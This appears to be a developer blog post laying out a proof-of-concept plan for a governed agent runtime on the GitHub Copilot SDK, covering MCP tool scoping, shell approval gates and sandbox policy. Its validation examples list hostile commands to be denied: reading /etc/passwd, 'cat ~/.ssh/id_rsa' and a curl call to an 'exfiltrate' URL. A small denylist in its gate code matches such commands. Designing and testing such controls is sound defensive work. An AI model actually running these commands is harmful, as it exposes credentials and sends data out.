Jangwook Kim

Posted on Jun 7 • Originally published at effloow.com

GitHub Copilot SDK: Governed Agent Runtime PoC


GitHub moved the Copilot SDK to general availability on June 2, 2026, and announced cloud and local sandboxes for GitHub Copilot in public preview the same day. That combination matters more than another "AI coding assistant" headline because it gives developer-tool teams a credible path to embed an agent runtime while keeping tool access, approval policy, identity, and execution isolation as separate controls.

This article is not a hands-on Copilot sandbox review. Effloow Lab did not authenticate to GitHub Copilot, create a real SDK session, run Copilot CLI, or start a cloud sandbox. The evidence here is narrower and explicit: official GitHub changelog/docs research, an npm registry check showing @github/copilot-sdk latest at 1.0.0, and a saved OpenAI API prompt harness that generated a synthetic implementation-risk matrix for a governed runtime. The lab artifact is saved at data/lab-runs/github-copilot-sdk-sandboxes-agent-runtime-poc-2026.md.

Use this as a PoC blueprint for deciding what to build and what to verify before you let an embedded agent inspect code, call MCP tools, run shell commands, or move execution into a cloud sandbox.

What You'll Build

The target PoC is a governed agent runtime for a developer-tool product. The user opens a web app, points the agent at a sample repository, and asks for a small engineering task such as "inspect this repo and summarize migration risks." The runtime should:

create a Copilot SDK session with a stable, auditable configuration;
expose only approved MCP tools;
limit filesystem access to a temporary workspace such as /tmp/agent-work;
require human approval before shell commands;
treat repository and issue contents as untrusted input;
optionally start a cloud session only when organization policy allows it;
log approvals, denials, tool calls, failures, and policy decisions.

GitHub's SDK announcement says the GA SDK provides programmatic access to the Copilot agent runtime for planning, tool invocation, file edits, streaming, and multi-turn sessions. GitHub's docs also show SDK setup across TypeScript, Python, Go, .NET, Rust, and Java. The npm check in this workflow confirmed @github/copilot-sdk exists with latest set to 1.0.0.

The missing part is not "can an agent answer a prompt?" The missing part is whether your product can make the agent governable enough for a buyer to trust.

Prerequisites

You need a GitHub Copilot entitlement or BYOK configuration that is valid for the SDK path you choose. GitHub's authentication docs describe several modes: an interactively signed-in GitHub user, OAuth GitHub App user tokens, environment-based tokens, and BYOK. Classic ghp_ personal access tokens are listed as unsupported in the SDK authentication docs; do not build your PoC around them.
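One way to act on that last point is a preflight check that refuses classic tokens before any session is created. The sketch below is illustrative only: classifyToken and its return labels are hypothetical names, not SDK APIs, and the only fact it encodes is that ghp_ tokens are listed as unsupported. Every other token is reported as unverified rather than assumed valid.

```typescript
// Hypothetical preflight helper; not part of the Copilot SDK.
type TokenVerdict = "missing" | "unsupported_classic_pat" | "unverified";

function classifyToken(token: string | undefined): TokenVerdict {
  if (!token || token.trim() === "") return "missing";
  // Classic personal access tokens start with "ghp_".
  if (token.trim().startsWith("ghp_")) return "unsupported_classic_pat";
  // Anything else still has to be proven by a real, authenticated SDK call.
  return "unverified";
}
```

A PoC can fail fast on "missing" or "unsupported_classic_pat" and record "unverified" as an open item until a live session confirms the auth mode.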

For a TypeScript scaffold, the official getting-started docs use:

mkdir copilot-runtime-poc
cd copilot-runtime-poc
npm init -y --init-type module
npm install @github/copilot-sdk tsx

Expected package-level evidence from this Effloow run:

{
  "version": "1.0.0",
  "name": "@github/copilot-sdk",
  "dist-tags": {
    "latest": "1.0.0"
  }
}

Expected runtime behavior is [DATA NOT AVAILABLE] until you authenticate and run the SDK in your own environment. That distinction matters. A package install or docs-based scaffold does not prove that your organization policy, Copilot plan, MCP server, sandbox settings, or cloud-session entitlement will work.
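To keep package-level evidence separate from runtime evidence, a small check can compare a saved registry snapshot against what the PoC expects. This is a minimal sketch under stated assumptions: checkPackageEvidence is a hypothetical helper, it models only the fields shown in the JSON above, and it says nothing about whether the SDK will run in your environment.

```typescript
// Hypothetical shape: only the fields shown in the snapshot above are modeled.
type RegistrySnapshot = {
  name: string;
  version: string;
  "dist-tags": { latest: string };
};

// Returns a list of mismatches; an empty list means the snapshot matches expectations.
function checkPackageEvidence(raw: string, expectedName: string, expectedLatest: string): string[] {
  const problems: string[] = [];
  const snapshot = JSON.parse(raw) as Partial<RegistrySnapshot>;
  if (snapshot.name !== expectedName) {
    problems.push(`unexpected name: ${String(snapshot.name)}`);
  }
  const latest = snapshot["dist-tags"]?.latest;
  if (latest !== expectedLatest) {
    problems.push(`latest is ${String(latest)}, expected ${expectedLatest}`);
  }
  return problems;
}
```

An empty result here belongs in the report as package evidence only; runtime behavior stays [DATA NOT AVAILABLE] until an authenticated run exists.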

Step 1: Define the Control Plane

Start with a control plane document before writing application code. For a buyer-facing PoC, this is the difference between "we embedded an agent" and "we know what the agent is allowed to do."

runtime:
  session_owner: authenticated_app_user
  default_execution: local
  cloud_execution: disabled_until_policy_allows
  repository_scope: sample_repository_only
tools:
  filesystem:
    type: mcp
    root: /tmp/agent-work
    access: read-write
  issue_reader:
    type: mcp
    access: read-only
  shell:
    enabled: approval_required
approval:
  shell_commands: human_required
  timeout_behavior: deny
logging:
  record_tool_calls: true
  record_approval_decisions: true
  redact_secrets: true

Expected output from this step is not a running agent. It is an approval-ready control contract. If a vendor cannot explain repository scope, tool scope, identity, approvals, and logs before demoing the agent, the PoC is not ready for a buyer.
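A control contract is easier to approve when it can be checked mechanically. The following sketch mirrors the YAML above as a TypeScript object and reviews it for fail-closed defaults. The ControlPlane type and reviewControlPlane function are hypothetical names for illustration, not an SDK schema, and the rules encode only what the contract above already states.

```typescript
// Hypothetical types mirroring the YAML contract above; not an SDK schema.
type ControlPlane = {
  runtime: {
    session_owner: string;
    default_execution: "local" | "cloud";
    cloud_execution: string;
    repository_scope: string;
  };
  tools: {
    filesystem: { type: "mcp"; root: string; access: "read-only" | "read-write" };
    issue_reader: { type: "mcp"; access: "read-only" | "read-write" };
    shell: { enabled: string };
  };
  approval: { shell_commands: string; timeout_behavior: string };
  logging: { record_tool_calls: boolean; record_approval_decisions: boolean; redact_secrets: boolean };
};

// Returns human-readable findings; an empty list means the contract passes this review.
function reviewControlPlane(cp: ControlPlane): string[] {
  const findings: string[] = [];
  if (cp.runtime.default_execution !== "local") findings.push("default execution should be local");
  if (cp.tools.filesystem.root.trim() === "") findings.push("filesystem tool has no declared root");
  if (cp.tools.issue_reader.access !== "read-only") findings.push("issue reader must be read-only");
  if (cp.tools.shell.enabled !== "approval_required") findings.push("shell must be approval-gated");
  if (cp.approval.shell_commands !== "human_required") findings.push("shell approval must be human");
  if (cp.approval.timeout_behavior !== "deny") findings.push("approval timeout must deny");
  for (const [key, value] of Object.entries(cp.logging)) {
    if (value !== true) findings.push(`logging.${key} must be true`);
  }
  return findings;
}

const contract: ControlPlane = {
  runtime: {
    session_owner: "authenticated_app_user",
    default_execution: "local",
    cloud_execution: "disabled_until_policy_allows",
    repository_scope: "sample_repository_only",
  },
  tools: {
    filesystem: { type: "mcp", root: "/tmp/agent-work", access: "read-write" },
    issue_reader: { type: "mcp", access: "read-only" },
    shell: { enabled: "approval_required" },
  },
  approval: { shell_commands: "human_required", timeout_behavior: "deny" },
  logging: { record_tool_calls: true, record_approval_decisions: true, redact_secrets: true },
};

console.log(reviewControlPlane(contract));
```

Running the review in CI means a weakened contract, such as a timeout that allows instead of denies, shows up as a finding before any agent session starts.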

Step 2: Create the Minimal SDK Session

GitHub's getting-started docs show a minimal TypeScript session with CopilotClient, createSession, and sendAndWait. Keep your first code path boring:

import { CopilotClient } from "@github/copilot-sdk";

async function main() {
  const client = new CopilotClient();

  const session = await client.createSession({
    model: "gpt-4.1"
  });

  const response = await session.sendAndWait({
    prompt: "Summarize the repository migration risks from the allowed workspace only."
  });

  console.log(response?.data.content);
  await client.stop();
}

main().catch((error) => {
  console.error(error);
  process.exit(1);
});

Expected result in a fully configured environment: a model response from the Copilot session. Expected result in many first-time environments: authentication, entitlement, policy, or runtime errors. Do not hide those errors in the PoC report. They are buyer-relevant evidence.

When cloud session creation fails for a policy reason, GitHub's cloud-session docs show handling the surfaced "policy_blocked" reason instead of retrying blindly. In a serious PoC, treat a policy denial as a successful governance signal, not as an implementation failure.
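The distinction between a governance signal and an implementation failure can be made explicit in the PoC report code. The sketch below assumes a simplified failure shape; SessionFailure and classifyFailure are hypothetical, and the real SDK error type may differ. The only value taken from the docs summary above is the "policy_blocked" reason string.

```typescript
// Hypothetical failure shape; the real SDK error type may look different.
type SessionFailure = { reason?: string; message: string };

type FailureOutcome = {
  kind: "governance_signal" | "implementation_failure";
  retry: boolean;
  note: string;
};

function classifyFailure(failure: SessionFailure): FailureOutcome {
  if (failure.reason === "policy_blocked") {
    // A policy denial is the control working as intended: record it and stop.
    return { kind: "governance_signal", retry: false, note: "Policy denied the session; no retry." };
  }
  // Everything else is reported as-is so it is not hidden from the PoC report.
  return { kind: "implementation_failure", retry: false, note: `Unclassified failure: ${failure.message}` };
}
```

Neither branch retries automatically. Whether some failures are safe to retry is a decision to make after observing real errors, not before.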

Step 3: Add MCP Tools With Explicit Scope

The SDK docs describe MCP server configuration and tool filtering. The MCP docs show a filesystem example using @modelcontextprotocol/server-filesystem and a tools field that can allow all tools, allow specific tools, or disable tools with an empty list.

For a governed PoC, avoid tools: ["*"] unless the MCP server itself exposes only the tiny capability surface you want. Prefer named tools when available:

import { CopilotClient } from "@github/copilot-sdk";

const client = new CopilotClient();

const session = await client.createSession({
  mcpServers: {
    filesystem: {
      type: "local",
      command: "npx",
      args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp/agent-work"],
      tools: ["read_file", "write_file", "list_directory"]
    },
    issueReader: {
      type: "local",
      command: "node",
      args: ["./mcp-issue-reader-readonly.js"],
      tools: ["get_issue", "list_issues"]
    }
  }
});

Expected validation:

# Should succeed
agent reads /tmp/agent-work/README.md

# Should fail
agent reads /etc/passwd
agent writes issue metadata
agent calls an unregistered MCP tool

The article caveat is blunt: this workflow did not run a live Copilot SDK session, so exact Copilot mediation behavior is [DATA NOT AVAILABLE]. The implementation requirement is still valid: if your app exposes MCP tools, the approved surface must be inspectable before the session starts and testable after the session runs.
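The "inspectable before, testable after" requirement can start as two pure functions that run without any Copilot session. This is a sketch, assuming a POSIX host and the tool names from the configuration above. isToolApproved and isInsideWorkspace are hypothetical helpers, and the path check does not resolve symlinks, which a real test suite would also need to cover.

```typescript
import path from "node:path";

// Hypothetical declared surface, copied from the session configuration above.
const approvedTools: Record<string, string[]> = {
  filesystem: ["read_file", "write_file", "list_directory"],
  issueReader: ["get_issue", "list_issues"],
};
const workspaceRoot = "/tmp/agent-work";

// True only when the server is registered and the tool is on its allowlist.
function isToolApproved(server: string, tool: string): boolean {
  return approvedTools[server]?.includes(tool) ?? false;
}

// Resolves the target first so "../" segments and sibling directories are rejected.
function isInsideWorkspace(target: string): boolean {
  const resolved = path.resolve(workspaceRoot, target);
  return resolved === workspaceRoot || resolved.startsWith(workspaceRoot + path.sep);
}
```

These checks cover the PoC's own policy layer. They do not show how the Copilot runtime mediates tool calls, which still needs an authenticated run.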

Step 4: Put Approval Before Shell Execution

GitHub's Copilot CLI docs cover allowing and denying tool use, and the SDK docs include hook surfaces such as pre-tool-use hooks. For a product PoC, shell execution should begin disabled or approval-gated.

The approval payload should show:

command;
working directory;
affected file path or resource, when known;
reason the agent requested it;
expected effect;
timeout behavior.
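The six fields above map naturally onto a typed payload that the approval UI and the audit log can share. The names below (ApprovalPayload, renderApprovalPrompt) are hypothetical and chosen for illustration. The sketch fixes timeout behavior to "deny" to match the control contract from Step 1.

```typescript
// Hypothetical payload shape built from the six fields listed above.
type ApprovalPayload = {
  command: string;
  workingDirectory: string;
  affectedResource: string | null; // null when the agent cannot name one
  reason: string;
  expectedEffect: string;
  timeoutBehavior: "deny";
};

// Renders the payload as plain text for a dialog or a log line.
function renderApprovalPrompt(p: ApprovalPayload): string {
  return [
    `Command: ${p.command}`,
    `Working directory: ${p.workingDirectory}`,
    `Affected resource: ${p.affectedResource ?? "unknown"}`,
    `Reason: ${p.reason}`,
    `Expected effect: ${p.expectedEffect}`,
    `On timeout: ${p.timeoutBehavior}`,
  ].join("\n");
}
```

Showing "unknown" for a missing resource, instead of omitting the line, keeps the reviewer aware of what the agent could not explain.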

A mock approval gate can start like this:

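import path from "node:path";

type ShellRequest = {
  command: string;
  cwd: string;
  reason: string;
};

const WORKSPACE = "/tmp/agent-work";

// Stub for the product's approval UI. Denies by default until a real dialog is wired in.
async function showHumanApprovalDialog(_request: ShellRequest): Promise<boolean> {
  return false;
}

async function approveShell(request: ShellRequest): Promise<boolean> {
  // Resolve first so "/tmp/agent-work-evil" and "/tmp/agent-work/../.." are rejected.
  const cwd = path.resolve(request.cwd);
  if (cwd !== WORKSPACE && !cwd.startsWith(WORKSPACE + path.sep)) return false;
  // Illustrative denylist only; substring checks are easy to bypass.
  if (request.command.includes("curl ")) return false;
  if (request.command.includes("cat ~/.ssh")) return false;

  return await showHumanApprovalDialog(request);
}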

Expected validation:

approve: npm test
deny: cat ~/.ssh/id_rsa
deny: curl https://example.invalid/exfiltrate
deny: command approval timeout

The OpenAI API harness saved for this article flagged command chaining, redirects, environment reads, and file writes outside allowed paths as validation cases. That is not a Copilot product finding. It is a synthetic risk checklist that a vendor should turn into actual tests.
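Those four validation cases can be turned into a first-pass flagger that annotates a command before a human sees it. This is a heuristic sketch, not a shell parser. flagCommand and its flag names are hypothetical, the regular expressions will produce both false positives and misses, and the path check assumes POSIX-style paths.

```typescript
import path from "node:path";

// Hypothetical heuristic flags; a production gate should parse commands, not pattern-match.
type CommandFlag = "chaining" | "redirect" | "env_read" | "path_outside_workspace";

function flagCommand(command: string, workspace = "/tmp/agent-work"): CommandFlag[] {
  const flags: CommandFlag[] = [];
  // Separators, pipes, backticks, and $( ... ) can smuggle in a second command.
  if (/[;&|`]|\$\(/.test(command)) flags.push("chaining");
  if (/[<>]/.test(command)) flags.push("redirect");
  // $VAR, ${VAR}, or the env/printenv utilities.
  if (/\$\{?[A-Za-z_]|\b(?:env|printenv)\b/.test(command)) flags.push("env_read");
  // Home-relative tokens, ".." segments, or absolute paths that normalize outside the workspace.
  const escapes = command.split(/\s+/).some((token) => {
    if (token.startsWith("~")) return true;
    if (token.split("/").includes("..")) return true;
    if (!token.startsWith("/")) return false;
    const normalized = path.posix.normalize(token);
    return normalized !== workspace && !normalized.startsWith(workspace + "/");
  });
  if (escapes) flags.push("path_outside_workspace");
  return flags;
}
```

The flags are meant as input to the human approval dialog. An empty list should not be treated as automatic approval.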

Step 5: Choose Local or Cloud Sandbox Deliberately

GitHub says cloud and local sandboxes for Copilot are in public preview and subject to change. GitHub's sandbox overview describes local sandboxing as restricted execution on the developer's machine and cloud sandboxing as isolated, ephemeral Linux environments hosted by GitHub. The same docs say sandboxes currently apply to Copilot CLI sessions, with cloud sandboxes also usable for sessions in the GitHub Copilot app.

Local sandbox controls are configured through the /sandbox command in Copilot CLI, with settings for filesystem, network, and general behavior. GitHub's docs mention settings stored under a sandbox key in the Copilot CLI configuration directory.

Cloud sandboxing is a buyer-sensitive decision because it changes execution location and billing. GitHub's billing docs state that billing applies to cloud sandboxing only, while local sandboxing is included in the standard Copilot seat. The same billing page says preview-era cloud use receives a monthly entitlement for eligible accounts in June 2026, and usage beyond entitlement is billed.

Use this decision table:

Execution Mode	Use When	Governance Check	PoC Caveat
Local session	Developer machine can safely host the task	Filesystem, network, keychain, and shell policy	Local machine state can leak into tests if not controlled
Cloud session	You need isolated hosted compute or cross-device continuity	Org policy, entitlement, repository context, budget	Preview behavior can change
Start disabled	Buyer has not approved cloud execution yet	Fail closed on missing policy	May reduce demo convenience but improves trust

For cloud sessions, GitHub's SDK docs recommend repository context and note that organization policies must allow remote control and viewing from cloud surfaces. Treat missing or unreadable policy as deny.
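"Treat missing or unreadable policy as deny" is simple to state and easy to get wrong in code, so it helps to write the gate down. In the sketch below, CloudGateInput and decideCloudExecution are hypothetical. How each input is obtained (policy lookup, billing approval) is product-specific and is not something this article verified.

```typescript
// Hypothetical gate inputs; how each value is obtained is product-specific.
type CloudGateInput = {
  orgPolicyAllowsCloud?: boolean; // undefined means missing or unreadable policy
  hasRepositoryContext: boolean;
  budgetApproved: boolean;
};

// Fails closed: cloud is allowed only when every check passes explicitly.
function decideCloudExecution(input: CloudGateInput): { cloudAllowed: boolean; reasons: string[] } {
  const reasons: string[] = [];
  if (input.orgPolicyAllowsCloud === undefined) {
    reasons.push("organization policy missing or unreadable");
  } else if (!input.orgPolicyAllowsCloud) {
    reasons.push("organization policy denies cloud execution");
  }
  if (!input.hasRepositoryContext) reasons.push("no repository context supplied");
  if (!input.budgetApproved) reasons.push("cloud billing not approved");
  return { cloudAllowed: reasons.length === 0, reasons };
}
```

Returning the reasons alongside the decision gives the audit log something concrete to record when a cloud session is refused.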

Step 6: Verify the Runtime With a Risk Matrix

Effloow Lab used scripts/openai-lab-run.py with a safe, synthetic prompt to produce a governance risk matrix. The prompt used no confidential data and asked the model not to invent product behavior, prices, benchmarks, quotes, or hands-on results.

The useful output was not code. It was a checklist of failure signals:

agent can read outside the sample repository;
MCP tools beyond the approved list are visible;
filesystem server reaches outside /tmp/agent-work;
read-only issue tool can mutate data;
shell command runs without approval;
cloud session starts when policy is denied or missing;
actions occur under an unexpected identity;
logs omit tool calls or approval decisions;
repository content can prompt-inject the agent into bypassing controls;
secrets appear in prompt, environment, tool output, or logs.

That list should become your PoC test plan. A credible implementation report should include pass/fail results for each item. If a control cannot be verified, write [DATA NOT AVAILABLE] instead of replacing evidence with confidence.
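A test plan in this style needs a result format that cannot quietly turn "not tested" into "pass". The following is a minimal sketch, assuming a three-state status. RiskCheck and summarize are hypothetical names, and the sample entries are placeholders, not results from this article.

```typescript
// Hypothetical result format; "[DATA NOT AVAILABLE]" follows this article's convention.
type Status = "pass" | "fail" | "[DATA NOT AVAILABLE]";
type RiskCheck = { failureSignal: string; status: Status; evidence?: string };

function summarize(checks: RiskCheck[]): { ready: boolean; report: string } {
  const report = checks
    .map((c) => `${c.status}: ${c.failureSignal}${c.evidence ? ` (${c.evidence})` : ""}`)
    .join("\n");
  // Only a fully passing matrix counts; unverified items block readiness too.
  const ready = checks.length > 0 && checks.every((c) => c.status === "pass");
  return { ready, report };
}

// Placeholder entries: nothing here has been verified.
const checks: RiskCheck[] = [
  { failureSignal: "shell command runs without approval", status: "[DATA NOT AVAILABLE]" },
  { failureSignal: "cloud session starts when policy is denied or missing", status: "[DATA NOT AVAILABLE]" },
];

console.log(summarize(checks).report);
```

Because an empty or partially verified matrix never reports ready, the format itself enforces the rule against replacing evidence with confidence.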

Verify It Works

A buyer-ready Copilot SDK runtime PoC should produce these artifacts:

runtime-config.yaml
mcp-tool-inventory.json
approval-flow-screenshots-or-logs.txt
sandbox-policy-notes.md
cloud-session-policy-check.md
test-results.md
limitations.md

Minimum acceptance criteria:

The SDK session starts only under an approved authentication mode.
MCP tool inventory is visible before the model can call tools.
Filesystem access is constrained to the declared workspace.
Shell commands require approval and denial is enforced.
Cloud execution is disabled unless policy and billing checks pass.
Logs show actor, tool, target, decision, and outcome.
Prompt-injection fixtures in repo files do not bypass controls.

If you cannot satisfy those seven items, keep the project in pilot status. The agent may still be useful, but it is not ready to be sold as governed automation.
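The logging criterion (actor, tool, target, decision, outcome) combined with secret redaction from the control contract can be sketched as one small formatter. AuditEntry, redact, and toLogLine are hypothetical names. The redaction patterns are illustrative only and cover GitHub-style token prefixes plus simple key=value secrets, so real deployments would need a dedicated secret scanner.

```typescript
// Hypothetical audit record using the five fields from the acceptance criteria.
type AuditEntry = {
  actor: string;
  tool: string;
  target: string;
  decision: "approved" | "denied";
  outcome: string;
};

// Illustrative redaction only; real secret detection needs a dedicated scanner.
function redact(text: string): string {
  return text
    .replace(/\bgh[pousr]_[A-Za-z0-9_]+/g, "[REDACTED]")
    .replace(/\b((?:token|password|secret)=)\S+/gi, "$1[REDACTED]");
}

// Emits one JSON line per decision, with free-text fields redacted.
function toLogLine(entry: AuditEntry, at: Date = new Date()): string {
  const safe = {
    at: at.toISOString(),
    actor: entry.actor,
    tool: entry.tool,
    target: redact(entry.target),
    decision: entry.decision,
    outcome: redact(entry.outcome),
  };
  return JSON.stringify(safe);
}
```

One JSON object per line keeps the log easy to grep and to attach to test-results.md as evidence.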

Troubleshooting FAQ

Q: Is the Copilot SDK production-ready?

GitHub announced the Copilot SDK as generally available on June 2, 2026. That supports production planning, but it does not automatically validate your product's tool policy, auth model, logging, or sandbox behavior.

Q: Are Copilot sandboxes generally available?

No. GitHub announced cloud and local sandboxes for Copilot as public preview on June 2, 2026, and GitHub Docs mark them as subject to change.

Q: Can I use MCP servers with the SDK?

GitHub Docs show SDK MCP server configuration and tool filtering. The safe product pattern is to expose only required tools, avoid broad wildcard access when possible, and test both allowed and forbidden tool calls.

Q: Does this article prove GitHub Copilot can run my exact agent workflow?

No. This article proves a bounded research and planning workflow: official-source verification, npm package availability, and an OpenAI-backed synthetic risk harness. Real Copilot runtime behavior requires authenticated testing in your environment.

Verdict

Bottom Line

The Copilot SDK GA release makes embedded agent runtimes worth a serious PoC, but the value is in the governance wrapper: MCP scoping, approval hooks, sandbox policy, cloud-session controls, and evidence logs. Treat sandbox previews and unverified runtime behavior as test targets, not assumptions.

For developer-tool vendors, the opportunity is clear. You no longer need to pitch a generic chatbot bolted onto an app. You can show a controlled agent surface with explicit tools, approvals, execution boundaries, and failure evidence. That is the kind of proof technical buyers can evaluate.

For Effloow-style technical content, this is also the standard: source-backed claims, small lab artifacts, clear limitations, and no invented hands-on story.
